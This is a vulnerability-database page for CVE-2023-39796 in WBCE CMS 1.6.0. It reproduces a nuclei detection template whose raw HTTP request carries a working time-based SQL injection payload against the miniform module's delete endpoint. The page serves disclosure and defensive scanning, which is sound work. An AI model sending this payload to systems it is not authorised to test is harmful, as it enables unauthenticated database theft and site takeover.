Lucene search
K

WBCE 1.6.0 - SQL Injection

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 82 Views

WBCE 1.6.0 - SQL Injection vulnerability in miniform module, allowing unauthenticated access to the database and takeover.

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
WBCE 1.6.0 - Unauthenticated SQL injection Vulnerability
12 Apr 202400:00
zdt
ATTACKERKB
CVE-2023-39796
10 Nov 202306:15
attackerkb
Circl
CVE-2023-39796
23 Nov 202314:03
circl
CNNVD
WBCE CMS Security Vulnerability
10 Nov 202300:00
cnnvd
CVE
CVE-2023-39796
10 Nov 202300:00
cve
Cvelist
CVE-2023-39796
10 Nov 202300:00
cvelist
Exploit DB
WBCE 1.6.0 - Unauthenticated SQL injection
12 Apr 202400:00
exploitdb
NVD
CVE-2023-39796
10 Nov 202306:15
nvd
Packet Storm
WBCE 1.6.0 SQL Injection
15 Apr 202400:00
packetstorm
Prion
Sql injection
10 Nov 202306:15
prion
Rows per page
id: CVE-2023-39796

info:
  name: WBCE 1.6.0 - SQL Injection
  author: youngpope
  severity: critical
  description: |
    There is an sql injection vulnerability in "miniform module" which is a default module installed in the WBCE cms. It is an unauthenticated sqli so anyone could access it and takeover the whole database. In file "/modules/miniform/ajax_delete_message.php" there is no authentication check. On line 40 in this file, there is a DELETE query that is vulnerable, an attacker could jump from the query using the tick sign - `.
  impact: |
    Unauthenticated attackers can execute time-based SQL injection through the DB_RECORD_TABLE parameter in the miniform module to extract the complete CMS database and takeover the WBCE installation.
  remediation: Fixed in version 1.6.1
  reference:
    - https://forum.wbce.org/viewtopic.php?pid=42046#p42046
    - https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1
    - https://pastebin.com/PBw5AvGp
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-39796
    cwe-id: CWE-89
    epss-score: 0.06096
    epss-percentile: 0.92547
    cpe: cpe:2.3:a:wbce:wbce_cms:1.6.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wbce
    product: wbce_cms
  tags: time-based-sqli,cve,cve2023,sqli,wbce,intrusive,vkev,vuln

http:
  - raw:
      - |
        @timeout: 20s
        POST /modules/miniform/ajax_delete_message.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=delete&DB_RECORD_TABLE=miniform_data`+WHERE+1%3d1+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))a)--+&iRecordID=1&DB_COLUMN=message_id&MODULE=&purpose=delete_record

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code_1 == 200'
          - 'contains(body, "Record deleted successfully!")'
        condition: and
# digest: 490a00463044022047c1fd51878cfca833744cc787630264566058f9fa2f7173369993b9b854bd20022006377688971390628c24cebd70447c580a9ca1ed2a6a7f04d0f69d0ca22df902:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.19.8
EPSS0.06096
SSVC
82